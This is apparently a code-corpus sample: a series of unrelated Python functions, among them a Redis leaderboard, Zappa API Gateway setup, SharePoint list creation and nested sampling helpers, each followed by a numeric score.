price_diff( feed["core_exchange_rate"], current_feed["core_exchange_rate"] ), ] ) for missing in builtins.set(witness_accounts).difference(producingwitnesses): witness = Witness(missing) t.add_row( [ click.style(asset["symbol"], bg="red"), click.style(witness.account["name"], bg="red"), click.style( "X" if feed["producer"]["id"] in witness_accounts else "", bold=True, ), click.style(str(datetime(1970, 1, 1))), click.style("missing", bg="red"), click.style("missing", bg="red"), click.style("missing", bg="red"), click.style("missing", bg="red"), click.style("missing", bg="red"), ] ) output += t.get_string(sortby="Date", reversesort=True) output += "\n" click.echo(output)
0.001845
def rank_for_in(self, leaderboard_name, member): ''' Retrieve the rank for a member in the named leaderboard. @param leaderboard_name [String] Name of the leaderboard. @param member [String] Member name. @return the rank for a member in the leaderboard. ''' if self.order == self.ASC: try: return self.redis_connection.zrank( leaderboard_name, member) + 1 except: return None else: try: return self.redis_connection.zrevrank( leaderboard_name, member) + 1 except: return None
0.00578
def __read_graph(self, network_filename): """ Read .ncol network file :param network_filename: complete path for the .ncol file :return: an undirected network """ self.g = nx.read_edgelist(network_filename, nodetype=int)
0.007435
def define(self, key, value): """ Defines the value for the inputted key by setting both its default and \ value to the inputted value. :param key | <str> value | <variant> """ skey = nstr(key) self._defaults[skey] = value self[skey] = value
0.01173
def get_agent(self): """Gets the ``Agent`` identified in this authentication credential. :return: the ``Agent`` :rtype: ``osid.authentication.Agent`` :raise: ``OperationFailed`` -- unable to complete request *compliance: mandatory -- This method must be implemented.* """ agent_id = self.get_agent_id() return Agent(identifier=agent_id.identifier, namespace=agent_id.namespace, authority=agent_id.authority)
0.003876
def shutdown(self): """ Shutdown the application and exit :returns: No return value """ task = asyncio.ensure_future(self.core.shutdown()) self.loop.run_until_complete(task)
0.009009
def ingest(self): """*Import the IFS catalogue into the sherlock-catalogues database* The method first generates a list of python dictionaries from the IFS datafile, imports this list of dictionaries into a database table and then generates the HTMIDs for that table. **Usage:** See class docstring for usage """ self.log.debug('starting the ``get`` method') self.primaryIdColumnName = "primaryId" self.raColName = "raDeg" self.declColName = "decDeg" self.dbTableName = "tcs_cat_ifs_stream" self.databaseInsertbatchSize = 500 dictList = self._create_dictionary_of_IFS() tableName = self.dbTableName createStatement = """ CREATE TABLE `%(tableName)s` ( `primaryId` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'An internal counter', `dateCreated` datetime DEFAULT CURRENT_TIMESTAMP, `decDeg` double DEFAULT NULL, `name` varchar(100) COLLATE utf8_unicode_ci DEFAULT NULL, `raDeg` double DEFAULT NULL, `z` double DEFAULT NULL, `htm16ID` bigint(20) DEFAULT NULL, `htm10ID` bigint(20) DEFAULT NULL, `htm13ID` bigint(20) DEFAULT NULL, `dateLastModified` datetime DEFAULT CURRENT_TIMESTAMP, `updated` varchar(45) DEFAULT '0', PRIMARY KEY (`primaryId`), UNIQUE KEY `radeg_decdeg` (`raDeg`,`decDeg`), KEY `idx_htm16ID` (`htm16ID`), KEY `idx_htm10ID` (`htm10ID`), KEY `idx_htm13ID` (`htm13ID`) ) ENGINE=MyISAM AUTO_INCREMENT=0 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; """ % locals() self.add_data_to_database_table( dictList=dictList, createStatement=createStatement ) self.log.debug('completed the ``get`` method') return None
0.003322
def create_api_gateway_routes( self, lambda_arn, api_name=None, api_key_required=False, authorization_type='NONE', authorizer=None, cors_options=None, description=None, endpoint_configuration=None ): """ Create the API Gateway for this Zappa deployment. Returns the new RestAPI CF resource. """ restapi = troposphere.apigateway.RestApi('Api') restapi.Name = api_name or lambda_arn.split(':')[-1] if not description: description = 'Created automatically by Zappa.' restapi.Description = description endpoint_configuration = [] if endpoint_configuration is None else endpoint_configuration if self.boto_session.region_name == "us-gov-west-1": endpoint_configuration.append("REGIONAL") if endpoint_configuration: endpoint = troposphere.apigateway.EndpointConfiguration() endpoint.Types = list(set(endpoint_configuration)) restapi.EndpointConfiguration = endpoint if self.apigateway_policy: restapi.Policy = json.loads(self.apigateway_policy) self.cf_template.add_resource(restapi) root_id = troposphere.GetAtt(restapi, 'RootResourceId') invocation_prefix = "aws" if self.boto_session.region_name != "us-gov-west-1" else "aws-us-gov" invocations_uri = 'arn:' + invocation_prefix + ':apigateway:' + self.boto_session.region_name + ':lambda:path/2015-03-31/functions/' + lambda_arn + '/invocations' ## # The Resources ## authorizer_resource = None if authorizer: authorizer_lambda_arn = authorizer.get('arn', lambda_arn) lambda_uri = 'arn:{invocation_prefix}:apigateway:{region_name}:lambda:path/2015-03-31/functions/{lambda_arn}/invocations'.format( invocation_prefix=invocation_prefix, region_name=self.boto_session.region_name, lambda_arn=authorizer_lambda_arn ) authorizer_resource = self.create_authorizer( restapi, lambda_uri, authorizer ) self.create_and_setup_methods( restapi, root_id, api_key_required, invocations_uri, authorization_type, authorizer_resource, 0 ) if cors_options: self.create_and_setup_cors( restapi, root_id, invocations_uri, 0, cors_options ) resource = troposphere.apigateway.Resource('ResourceAnyPathSlashed') self.cf_api_resources.append(resource.title) resource.RestApiId = troposphere.Ref(restapi) resource.ParentId = root_id resource.PathPart = "{proxy+}" self.cf_template.add_resource(resource) self.create_and_setup_methods( restapi, resource, api_key_required, invocations_uri, authorization_type, authorizer_resource, 1 ) # pragma: no cover if cors_options: self.create_and_setup_cors( restapi, resource, invocations_uri, 1, cors_options ) # pragma: no cover return restapi
0.005158
def AddList(self, listName, description, templateID): """Create a new List Provide: List Name, List Description, and List Template Templates Include: Announcements Contacts Custom List Custom List in Datasheet View DataSources Discussion Board Document Library Events Form Library Issues Links Picture Library Survey Tasks """ templateIDs = {'Announcements': '104', 'Contacts': '105', 'Custom List': '100', 'Custom List in Datasheet View': '120', 'DataSources': '110', 'Discussion Board': '108', 'Document Library': '101', 'Events': '106', 'Form Library': '115', 'Issues': '1100', 'Links': '103', 'Picture Library': '109', 'Survey': '102', 'Tasks': '107'} IDnums = [100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 115, 120, 1100] # Let's automatically convert the different # ways we can select the templateID if type(templateID) == int: templateID = str(templateID) elif type(templateID) == str: if templateID.isdigit(): pass else: templateID = templateIDs[templateID] # Build Request soap_request = soap('AddList') soap_request.add_parameter('listName', listName) soap_request.add_parameter('description', description) soap_request.add_parameter('templateID', templateID) self.last_request = str(soap_request) # Send Request response = self._session.post(url=self._url('Lists'), headers=self._headers('AddList'), data=str(soap_request), verify=self._verify_ssl, timeout=self.timeout) # Parse Request print(response) if response == 200: return response.text else: return response
0.000818
def do_statement(source, start): """returns none if not found other functions that begin with 'do_' raise also this do_ type function passes white space""" start = pass_white(source, start) # start is the fist position after initial start that is not a white space or \n if not start < len(source): #if finished parsing return None return None, start if any(startswith_keyword(source[start:], e) for e in {'case', 'default'}): return None, start rest = source[start:] for key, meth in KEYWORD_METHODS.iteritems( ): # check for statements that are uniquely defined by their keywords if rest.startswith(key): # has to startwith this keyword and the next letter after keyword must be either EOF or not in IDENTIFIER_PART if len(key) == len(rest) or rest[len(key)] not in IDENTIFIER_PART: return meth(source, start) if rest[0] == '{': #Block return do_block(source, start) # Now only label and expression left cand = parse_identifier(source, start, False) if cand is not None: # it can mean that its a label label, cand_start = cand cand_start = pass_white(source, cand_start) if source[cand_start] == ':': return do_label(source, start) return do_expression(source, start)
0.00374
def _create_add_petabencana_layer_action(self): """Create action for import OSM Dialog.""" icon = resources_path('img', 'icons', 'add-petabencana-layer.svg') self.action_add_petabencana_layer = QAction( QIcon(icon), self.tr('Add PetaBencana Flood Layer'), self.iface.mainWindow()) self.action_add_petabencana_layer.setStatusTip(self.tr( 'Add PetaBencana Flood Layer')) self.action_add_petabencana_layer.setWhatsThis(self.tr( 'Use this to add a PetaBencana layer to your map. ' 'It needs internet access to function.')) self.action_add_petabencana_layer.triggered.connect( self.add_petabencana_layer) self.add_action( self.action_add_petabencana_layer, add_to_toolbar=self.full_toolbar)
0.002356
def get_parent_bin_ids(self, bin_id): """Gets the parent ``Ids`` of the given bin. arg: bin_id (osid.id.Id): the ``Id`` of a bin return: (osid.id.IdList) - the parent ``Ids`` of the bin raise: NotFound - ``bin_id`` is not found raise: NullArgument - ``bin_id`` is ``null`` raise: OperationFailed - unable to complete request raise: PermissionDenied - authorization failure *compliance: mandatory -- This method must be implemented.* """ # Implemented from template for # osid.resource.BinHierarchySession.get_parent_bin_ids if self._catalog_session is not None: return self._catalog_session.get_parent_catalog_ids(catalog_id=bin_id) return self._hierarchy_session.get_parents(id_=bin_id)
0.003695
def canFetchMore(self, index): '''Return if more data available for *index*.''' if not index.isValid(): item = self.root else: item = index.internalPointer() return item.canFetchMore()
0.008299
def bounds(self) -> typing.Tuple[typing.Tuple[float, float], typing.Tuple[float, float]]: """Return the bounds property in relative coordinates. Bounds is a tuple ((top, left), (height, width))""" ...
0.013333
def process_incoming_tuples(self): """Should be called when tuple was buffered into in_stream This method is equivalent to ``addBoltTasks()`` but is designed for event-driven single-thread bolt. """ # back-pressure if self.output_helper.is_out_queue_available(): self._read_tuples_and_execute() self.output_helper.send_out_tuples() else: # update outqueue full count self.bolt_metrics.update_out_queue_full_count()
0.010707
def import_tags(self, tag_nodes): """ Import all the tags form 'wp:tag' nodes, because tags in 'item' nodes are not necessarily all the tags, then use only the nicename, because it's like a slug and the true tag name may be not valid for url usage. """ self.write_out(self.style.STEP('- Importing tags\n')) for tag_node in tag_nodes: tag_name = tag_node.find( '{%s}tag_slug' % WP_NS).text[:50] self.write_out('> %s... ' % tag_name) Tag.objects.get_or_create(name=tag_name) self.write_out(self.style.ITEM('OK\n'))
0.003125
def delete(self, request, bot_id, hook_id, id, format=None): """ Delete an existing telegram recipient --- responseMessages: - code: 401 message: Not authenticated """ bot = self.get_bot(bot_id, request.user) hook = self.get_hook(hook_id, bot, request.user) recipient = self.get_recipient(id, hook, request.user) recipient.delete() return Response(status=status.HTTP_204_NO_CONTENT)
0.00611
def dirpath_to_list(p): ''' dirpath_to_list(path) yields a list of directories contained in the given path specification. A path may be either a single directory name (==> [path]), a :-separated list of directories (==> path.split(':')), a list of directory names (==> path), or None (==> []). Note that the return value filters out parts of the path that are not directories. ''' if p is None: p = [] elif pimms.is_str(p): p = p.split(':') if len(p) > 0 and not pimms.is_vector(p, str): raise ValueError('Path is not equivalent to a list of dirs') return [pp for pp in p if os.path.isdir(pp)]
0.01087
def get_run_threads(ns_run): """ Get the individual threads from a nested sampling run. Parameters ---------- ns_run: dict Nested sampling run dict (see data_processing module docstring for more details). Returns ------- threads: list of numpy array Each thread (list element) is a samples array containing columns [logl, thread label, change in nlive at sample, (thetas)] with each row representing a single sample. """ samples = array_given_run(ns_run) unique_threads = np.unique(ns_run['thread_labels']) assert ns_run['thread_min_max'].shape[0] == unique_threads.shape[0], ( 'some threads have no points! {0} != {1}'.format( unique_threads.shape[0], ns_run['thread_min_max'].shape[0])) threads = [] for i, th_lab in enumerate(unique_threads): thread_array = samples[np.where(samples[:, 1] == th_lab)] # delete changes in nlive due to other threads in the run thread_array[:, 2] = 0 thread_array[-1, 2] = -1 min_max = np.reshape(ns_run['thread_min_max'][i, :], (1, 2)) assert min_max[0, 1] == thread_array[-1, 0], ( 'thread max logl should equal logl of its final point!') threads.append(dict_given_run_array(thread_array, min_max)) return threads
0.000747